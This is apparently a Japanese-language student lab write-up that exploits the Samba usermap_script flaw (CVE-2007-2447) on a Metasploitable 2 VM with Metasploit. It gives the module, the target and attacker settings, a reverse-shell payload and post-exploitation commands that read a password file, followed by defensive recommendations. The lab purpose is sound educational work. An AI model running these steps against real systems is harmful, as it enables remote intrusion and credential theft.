RedTeam-SMB-PenTest |
|
説明
このプロジェクトは、UMGCのCMIT 386コースの一環として実施したペネトレーションテストの活動をまとめたものです。Kali Linuxの攻撃VMからMetasploitを使用し、Metasploitable 2上のSamba SMB usermap_scriptの脆弱性(CVE-2007-2447)を悪用することに焦点を当てています。この概念実証は、レガシーな脆弱性がシステム全体の侵害、資格情報の窃取、データの外部持ち出しにつながることを示しています。
脆弱性の概要
この脆弱性はポート445のSambaサービスに存在し、username map scriptでの不適切な入力処理により、認証なしのリモートコマンド実行が可能になります。悪用された場合、攻撃者にルートレベルのシェルアクセスを提供します。
環境
実行手順
攻撃ホストとターゲットマシンの両方が起動して実行されていることを確認してください。

2. エクスプロイトを検索:
3. 適切なモジュールを使用:
use exploit/multi/samba/usermap_script
4. 必要なオプションを設定:
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse
5. エクスプロイトを実行:
6. エクスプロイト後のコマンド:
whoami
hostname
cd /redteam7/student3
cat mypass.txt
リセット手順
セッションがハングアップまたは切断された場合:
# Leave current shell
Ctrl C
exit
# Kill all background jobs
sessions -K
jobs -K
# Restart Metasploit
msfconsole

### 重要なポイント
usermap_script を使用する Samba 3.0.20 のようなレガシーサービスは非常に脆弱です。
- このSMB脆弱性を悪用すると、ルートシェルアクセスが得られます。
- 単純なコマンドで重要なデータを取得でき、現実世界のリスクを示しています。
- パッチ適用、ネットワーク分離、サービス露出の削減の必要性が証明されます。
推奨事項
- レガシーシステムは直ちにパッチを適用するか、廃止してください。
- 厳格なネットワーク分離とファイアウォールルールを実装してください。
- SMBへの露出は、内部の認証済みユーザーのみに制限してください。
- ログを監視して、不審なアクティビティや横展開を検出してください。
参考文献